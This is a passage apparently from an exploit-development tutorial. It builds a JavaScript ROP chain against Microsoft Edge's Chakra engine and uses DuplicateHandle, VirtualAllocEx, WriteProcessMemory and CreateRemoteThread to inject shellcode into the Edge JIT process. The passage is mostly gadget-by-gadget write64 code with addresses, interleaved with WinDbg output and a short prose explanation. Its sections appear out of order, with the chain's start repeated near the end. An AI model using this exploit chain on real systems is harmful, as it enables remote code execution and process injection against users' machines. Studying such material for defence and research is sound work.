write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)

write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

Before the call:

After the call:

Again, this is identical to last time and we use the ropoffsetTwo variable here, which is just used to essentially calculate the offset from where our VirtualProtect ROP chain began to the actual address within the ROP chain we want to update (lpAddress and our β€œfake” return address we want our ROP chain to jump to).

VirtualAlloc ROP Chain

This next function call may seem a bit confusing - a call to VirtualAlloc. We don’t really need to call this function, from an exploitation technique perspective. We will (after this function call) make a call to GetThreadContext to retrieve the state of the CPU registers for our previously created thread within the JIT process so that we can leak the value of RSP and eventually write our final ROP chain there. A GetThreadContext call expects a pointer to a CONTEXT structure - where the function will go and fill our the structure with the current CPU register state of a given thread (our remotely created thread).

On the current version of Windows used to develop this exploit, Windows 10 1703, a CONTEXT structure is 0x4d0 bytes in size. So, we will be setting up a call to VirtualAlloc to allocate 0x4d0 bytes of memory to store this structure for later usage.

Here is how our call will be setup:

	NULL,				// Let the system decide where to allocate the memory
	sizeof(CONTEXT),		// The size we want to allocate (size of a CONTEXT structure)
	MEM_COMMIT | MEM_RESERVE,	// Make sure this memory is committed and reserved
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it

Here is how this looks with ROP (with all previous ROP chains for context):

// alert() for debugging

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
